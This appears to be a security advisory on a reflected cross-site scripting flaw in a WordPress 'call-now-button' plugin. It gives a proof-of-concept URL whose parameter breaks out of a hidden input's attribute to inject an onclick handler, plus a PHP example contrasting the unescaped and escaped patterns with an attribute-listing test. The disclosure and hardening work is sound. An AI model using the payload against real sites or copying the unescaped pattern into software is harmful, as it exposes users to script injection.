The plugin does not escape a parameter before outputting it back in an attribute of a hidden input, leading to Reflected Cross-Site Scripting when premium is enabled.
With premium enabled: http://example.com/wp-admin/admin.php?page=call-now-button&bid=xxxxx" accesskey=X onclick=alert(/XSS/) test="
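The unescaped-attribute pattern described above next to its hardened form, as an added example that is not the plugin's own code. The function names and the hidden field's name are hypothetical; the sample value is the one from the URL above.

```php
<?php
// Added illustration, not the plugin's code. Function names and the
// hidden field's name are hypothetical.

// Vulnerable pattern: request value concatenated into an attribute unescaped.
function render_hidden_unsafe(string $bid): string {
    return '<input type="hidden" name="bid" value="' . $bid . '">';
}

// Hardened pattern: encode the value for an HTML attribute context.
// Inside WordPress, esc_attr() is the function to use here.
function render_hidden_safe(string $bid): string {
    $encoded = htmlspecialchars($bid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="bid" value="' . $encoded . '">';
}

// Check: parse the markup and list the attribute names on the <input>.
// Anything beyond type/name/value means the value broke out of its quotes.
function input_attributes(string $html): array {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate fragment-level warnings
    $doc->loadHTML($html);
    libxml_clear_errors();
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

// Value taken from the proof-of-concept URL on this page.
$bid = 'xxxxx" accesskey=X onclick=alert(/XSS/) test="';

$rendered = [
    'unsafe' => render_hidden_unsafe($bid),
    'safe'   => render_hidden_safe($bid),
];

foreach ($rendered as $label => $html) {
    $extra = array_diff(input_attributes($html), ['type', 'name', 'value']);
    printf("%-6s %s\n       injected attributes: %s\n", $label, $html,
        $extra ? implode(', ', $extra) : 'none');
}
```

The attribute-listing check can be reused as a regression test for any template that echoes request data into an attribute.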